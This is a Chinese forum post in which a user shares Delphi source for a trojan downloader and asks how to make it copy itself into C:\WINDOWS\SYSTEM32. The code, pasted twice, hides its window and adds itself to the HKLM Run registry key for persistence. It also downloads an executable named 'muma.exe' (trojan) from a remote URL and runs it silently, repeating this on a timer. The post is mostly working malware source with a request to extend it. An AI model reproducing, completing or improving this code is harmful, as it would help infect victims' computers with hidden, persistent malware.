您所在位置:主题:[讨论]Delphi如何写复制自身到C:WINDOWS\SYSTEM32\下?
Winmillion
[专家分:0] 发布于 2009-01-02 17:27:00
uses
UrlMon;
var
Form1: TForm1;
const
URLMuMa = 'U U';
implementation
{$R *.dfm}
procedure TForm1.Timer1Timer(Sender: TObject);
begin
WinExec('c:\muma.exe',SW_HIDE); //每隔5秒执行一次
Timer1.Enabled:=False;
end;
procedure TForm1.FormCreate(Sender: TObject);
var
Reg:TRegistry;
begin
Form1.Hide;
try
try
Reg:=TRegistry.Create;
Reg.RootKey:=HKEY_LOCAL_MACHINE;
if Reg.OpenKey('\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',True) then
begin
Reg.WriteString('启动项',ExtractFilePath(Application.ExeName)+ExtractFilename(Application.Exename));
Reg.CloseKey;
Reg.Free;
end;
except
end;
if not FileExists('c:\muma.exe') then //判断木马如果不在C盘里就只是Timer
begin
URLDownloadToFile(nil,PChar('http://www.baidu.com/muma.exe'),
PChar('c:\muma.exe'),0,nil);
WinExec('c:\muma.exe',SW_HIDE);
end
else
Timer1.Enabled := True;
except
end;
end;
end.
以上是下载者能写入注册表开机加载启动,和判断木马程序是否存在.
就差一个复制自身到C:WINDOWS\SYSTEM32\下,请前辈指教!!!
UrlMon;
var
Form1: TForm1;
const
URLMuMa = 'U U';
implementation
{$R *.dfm}
procedure TForm1.Timer1Timer(Sender: TObject);
begin
WinExec('c:\muma.exe',SW_HIDE); //每隔5秒执行一次
Timer1.Enabled:=False;
end;
procedure TForm1.FormCreate(Sender: TObject);
var
Reg:TRegistry;
begin
Form1.Hide;
try
try
Reg:=TRegistry.Create;
Reg.RootKey:=HKEY_LOCAL_MACHINE;
if Reg.OpenKey('\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',True) then
begin
Reg.WriteString('启动项',ExtractFilePath(Application.ExeName)+ExtractFilename(Application.Exename));
Reg.CloseKey;
Reg.Free;
end;
except
end;
if not FileExists('c:\muma.exe') then //判断木马如果不在C盘里就只是Timer
begin
URLDownloadToFile(nil,PChar('http://www.baidu.com/muma.exe'),
PChar('c:\muma.exe'),0,nil);
WinExec('c:\muma.exe',SW_HIDE);
end
else
Timer1.Enabled := True;
except
end;
end;
end.
以上是下载者能写入注册表开机加载启动,和判断木马程序是否存在.
就差一个复制自身到C:WINDOWS\SYSTEM32\下,请前辈指教!!!
